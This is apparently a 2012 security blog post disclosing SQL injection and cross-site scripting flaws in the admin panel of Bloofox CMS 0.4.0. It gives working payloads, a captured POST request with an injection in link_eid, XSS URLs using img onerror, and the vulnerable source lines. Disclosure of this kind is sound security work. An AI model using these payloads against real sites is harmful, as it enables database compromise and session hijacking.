Thursday 8 March 2012

SQL injection/XSS in latest Bloofox CMS 0.4.0

# TITLE ....... # Multiple Post-auth sql injection/xss in Bloofox CMS 0.4.0 .... #
# DATE ........ # 08.03.2012
# AUTOHR ...... # http://hauntit.blogspot.com
# SOFT LINK ... # http://www.bloofox.com/
# VERSION ..... # 0.4.0
# TESTED ON ... # LAMP
# .............................................................................. #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...

#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
This is sql injection bug, but important is fact that this vulnerability
can be triggered only by 'editor'-role user.

#............................................#
# 3. Where is bug :)
# A) sqli

Log in as a 'editor'-role user.

http://bloofoxCMS_0.4.0/admin/index.php?page=profiles&user_id=;'

And here is view from source code:
...cut...
bloofoxCMS_0.4.0/admin$ grep -n -r -e "uid" ./ | grep -e "\\$"| grep GET
./include/inc_user_user.php:152:        $db->query("SELECT * FROM ".$tbl_prefix."sys_user WHERE uid = '".$_GET['userid']."' ORDER BY uid LIMIT 1");
./include/inc_user_user.php:210:        $db->query("SELECT uid,username FROM ".$tbl_prefix."sys_user WHERE uid = '".$_GET['userid']."' ORDER BY uid LIMIT 1");
...cut...

Try this:
&user_id=2' or '1'%3d'2
&user_id=2' or '2'%3d'2

;)

#............................................#
# B) sqli-02

...cut from Burp...
POST /www/lastz/bloofoxcms/bloofoxCMS_0.4.0/admin/index.php?mode=content&action=new HTTP/1.1
Host: localhost
(...)
Connection: close

name=AAAAAAAA3&link_type=3&link_url=&link_eid=1'%20and%20password%20%3d%20'1'%20or%20'1'%3d'1'&link_plugin=3&insert=1&insert_where=0&link_target=&link_param=&blocked=0&invisible=0&startdate=&enddate=&keywords=&description=&template_id=0&send=Add+Page

...cut from Burp...

Vulnerable parameter is link_eid.
This command should help You find vulnerable code:
@bloofoxCMS_0.4.0/admin$ grep -n -r -e link_eid ./

Another vulnerable parameter is "insert", "eid",

#............................................#
# C) xss

All parameters are vulnerable to XSS too.

#............................................#
# xss-02

http://bloofoxCMS_0.4.0/admin/index.php?mode=content&page=media&action=edit&file=%22%2f%3E%3Cimg%20src%3ddef%20onerror%3daBlert%2812312312323%29%3E%3C&type=1
http://bloofoxCMS_0.4.0/admin/index.php?mode=content&page=media&action=edit&file=de.gif&type=%22}}%27%22%3E%3Cimg%20src%3ddef%20onerror%3daBlert%2812312312323%29%3E

Vulnerable parameters: 'file'.

Some sqli, You should get here too:
When You are updating Your profile (as an editor) at /admin/index.php?page=myprofile
Try this parameters to make test-attacks: showemail, gender, be_lang, be_tmpl

#............................................#
# 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net


#............................................#
# Best regards
#


No comments:

Post a Comment

What do You think...?